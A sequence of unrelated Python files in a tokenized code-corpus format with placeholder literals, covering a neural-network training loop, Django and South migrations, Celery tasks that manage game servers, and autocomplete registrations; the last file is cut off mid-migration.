. put ( str ( val_filenames [ <NUM_LIT:0> ] ) ) <EOL> send_queue . put ( np . float32 ( [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0> ] ) ) <EOL> send_queue . put ( '<STR_LIT>' ) <EOL> for val_index in range ( n_val_batches ) : <EOL> if flag_para_load : <EOL> msg = recv_queue . get ( ) <EOL> assert msg == '<STR_LIT>' <EOL> if val_index + <NUM_LIT:1> < n_val_batches : <EOL> name_to_read = str ( val_filenames [ val_index + <NUM_LIT:1> ] ) <EOL> send_queue . put ( name_to_read ) <EOL> send_queue . put ( np . float32 ( [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0> ] ) ) <EOL> else : <EOL> val_img = hkl . load ( str ( val_filenames [ val_index ] ) ) - img_mean <EOL> param_rand = [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0> ] <EOL> val_img = crop_and_mirror ( val_img , param_rand , flag_batch = True ) <EOL> shared_x . set_value ( val_img ) <EOL> shared_y . set_value ( val_labels [ val_index * batch_size : <EOL> ( val_index + <NUM_LIT:1> ) * batch_size ] ) <EOL> if flag_top_5 : <EOL> loss , error , error_top_5 = validate_model ( ) <EOL> else : <EOL> loss , error = validate_model ( ) <EOL> if flag_para_load and ( val_index + <NUM_LIT:1> < n_val_batches ) : <EOL> send_queue . put ( '<STR_LIT>' ) <EOL> validation_losses . append ( loss ) <EOL> validation_errors . append ( error ) <EOL> if flag_top_5 : <EOL> validation_errors_top_5 . append ( error_top_5 ) <EOL> this_validation_loss = np . mean ( validation_losses ) <EOL> this_validation_error = np . mean ( validation_errors ) <EOL> if flag_top_5 : <EOL> this_validation_error_top_5 = np . mean ( validation_errors_top_5 ) <EOL> return this_validation_error , this_validation_error_top_5 , this_validation_loss <EOL> else : <EOL> return this_validation_error , this_validation_loss <EOL> def get_rand3d ( ) : <EOL> tmp_rand = np . float32 ( np . random . rand ( <NUM_LIT:3> ) ) <EOL> tmp_rand [ <NUM_LIT:2> ] = round ( tmp_rand [ <NUM_LIT:2> ] ) <EOL> return tmp_rand <EOL> def train_model_wrap ( train_model , shared_x , shared_y , rand_arr , img_mean , <EOL> count , minibatch_index , minibatch_range , batch_size , <EOL> train_filenames , train_labels , <EOL> flag_para_load , <EOL> flag_batch , <EOL> send_queue = None , recv_queue = None ) : <EOL> if flag_para_load : <EOL> msg = recv_queue . get ( ) <EOL> assert msg == '<STR_LIT>' <EOL> if count < len ( minibatch_range ) : <EOL> ind_to_read = minibatch_range [ count ] <EOL> name_to_read = str ( train_filenames [ ind_to_read ] ) <EOL> send_queue . put ( name_to_read ) <EOL> send_queue . put ( get_rand3d ( ) ) <EOL> else : <EOL> batch_img = hkl . load ( str ( train_filenames [ minibatch_index ] ) ) - img_mean <EOL> param_rand = get_rand3d ( ) <EOL> batch_img = crop_and_mirror ( batch_img , param_rand , flag_batch = flag_batch ) <EOL> shared_x . set_value ( batch_img ) <EOL> batch_label = train_labels [ minibatch_index * batch_size : <EOL> ( minibatch_index + <NUM_LIT:1> ) * batch_size ] <EOL> shared_y . set_value ( batch_label ) <EOL> cost_ij = train_model ( ) <EOL> return cost_ij </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:port>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:port>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import os <EOL> from datetime import timedelta <EOL> from subprocess import Popen <EOL> from celery import task <EOL> from django . contrib . auth . models import User <EOL> from django . utils import timezone <EOL> from mod . models import TaskEvent <EOL> from settings import MEDIA_ROOT , SERVER_EXEC <EOL> @ task ( ) <EOL> def run_server ( path , server ) : <EOL> log_path = os . path . join ( MEDIA_ROOT , '<STR_LIT>' , server . owner . username , server . mod . title ) <EOL> if not os . path . exists ( log_path ) : <EOL> os . makedirs ( log_path ) <EOL> with open ( os . path . join ( log_path , '<STR_LIT>' . format ( server . id , timezone . now ( ) . strftime ( "<STR_LIT>" ) , User . objects . make_random_password ( ) ) ) , '<STR_LIT:w>' ) as f : <EOL> p = Popen ( ( os . path . join ( path , SERVER_EXEC ) , '<STR_LIT>' , os . path . join ( path , '<STR_LIT>' , server . owner . username , '<STR_LIT>' . format ( server . id ) , server . random_key , '<STR_LIT>' ) ) , cwd = path , stdout = f , stderr = f ) <EOL> server . pid = p . pid <EOL> server . online = True <EOL> server . locked = False <EOL> server . save ( ) <EOL> @ task ( ) <EOL> def check_server_state ( ) : <EOL> from mod . models import Server <EOL> servers = Server . active . filter ( is_active = True ) <EOL> for server in servers : <EOL> old_is_online = server . is_online <EOL> if not server . is_online and server . set_online_at >= timezone . now ( ) - timedelta ( seconds = <NUM_LIT:10> ) : <EOL> server . locked = False <EOL> server . save ( ) <EOL> server . check_online ( ) <EOL> server . get_server_info ( ) <EOL> if server . automatic_restart and old_is_online and not server . is_online : <EOL> server . set_online ( ) <EOL> @ task ( ) <EOL> def start_server ( event_id ) : <EOL> event = TaskEvent . objects . filter ( pk = event_id ) <EOL> if event : <EOL> event = event [ <NUM_LIT:0> ] <EOL> else : <EOL> return <EOL> event . server . set_online ( ) <EOL> if not event . repeat : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> else : <EOL> next_run = event . date + timedelta ( minutes = event . repeat ) <EOL> if timezone . now ( ) >= next_run : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> return <EOL> task = start_server . apply_async ( ( event_id , ) , eta = next_run ) <EOL> event . date = next_run <EOL> event . task_id = task . task_id <EOL> event . save ( update_fields = [ '<STR_LIT:date>' , '<STR_LIT>' ] ) <EOL> @ task ( ) <EOL> def stop_server ( event_id ) : <EOL> event = TaskEvent . objects . filter ( pk = event_id ) <EOL> if event : <EOL> event = event [ <NUM_LIT:0> ] <EOL> else : <EOL> return <EOL> event . server . set_offline ( ) <EOL> if not event . repeat : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> else : <EOL> next_run = event . date + timedelta ( minutes = event . repeat ) <EOL> if timezone . now ( ) >= next_run : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> return <EOL> task = stop_server . apply_async ( ( event_id , ) , eta = next_run ) <EOL> event . date = next_run <EOL> event . task_id = task . task_id <EOL> event . save ( update_fields = [ '<STR_LIT:date>' , '<STR_LIT>' ] ) <EOL> @ task ( ) <EOL> def restart_server ( event_id ) : <EOL> event = TaskEvent . objects . filter ( pk = event_id ) <EOL> if event : <EOL> event = event [ <NUM_LIT:0> ] <EOL> else : <EOL> return <EOL> if event . server . is_online : <EOL> event . server . set_offline ( ) <EOL> event . server . set_online ( ) <EOL> if not event . repeat : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> else : <EOL> next_run = event . date + timedelta ( minutes = event . repeat ) <EOL> if timezone . now ( ) >= next_run : <EOL> event . status = <NUM_LIT:2> <EOL> event . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> return <EOL> task = restart_server . apply_async ( ( event_id , ) , eta = next_run ) <EOL> event . date = next_run <EOL> event . task_id = task . task_id <EOL> event . save ( update_fields = [ '<STR_LIT:date>' , '<STR_LIT>' ] ) </s>
<s> import autocomplete_light . shortcuts as al <EOL> from models import * <EOL> class AuthorityAutocomplete ( al . AutocompleteModelBase ) : <EOL> """<STR_LIT>""" <EOL> choice_html_format = u'''<STR_LIT>''' <EOL> def choice_html ( self , choice ) : <EOL> return self . choice_html_format % ( self . choice_value ( choice ) , self . choice_label ( choice ) , choice . description ) <EOL> search_fields = [ '<STR_LIT>' , ] <EOL> autocomplete_js_attributes = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } <EOL> widget_js_attributes = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> } <EOL> al . register ( Authority , AuthorityAutocomplete ) <EOL> al . register ( Language , <EOL> search_fields = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } , <EOL> widget_attrs = { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> } , <EOL> ) <EOL> al . register ( Citation , <EOL> search_fields = [ '<STR_LIT>' , ] , <EOL> attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> } , <EOL> widget_attrs = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> } , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> import django . db . models . deletion <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = '<STR_LIT>' ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . conf import settings <EOL> from django . db import migrations , models <EOL> import django . db . models . deletion <EOL> class Migration ( migrations . Migration ) : <EOL> initial = True <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> migrations . swappable_dependency ( settings . AUTH_USER_MODEL ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:2> ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT:value>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:1000> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:255> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:255> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:255> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:2> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT:value>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:title>' , models . CharField ( blank = True , max_length = <NUM_LIT:1000> , null = True ) ) , <EOL> ( '<STR_LIT:description>' , models . TextField ( blank = True , null = True ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( blank = True , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:2> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:100> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:10> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:10> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:10> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( blank = True , max_length = <NUM_LIT:10> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT:value>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( on_delete = django . db . models . deletion . CASCADE , related_name = '<STR_LIT>' , to = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( blank = True , null = True , on_delete = django . db . models . deletion . CASCADE , to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( 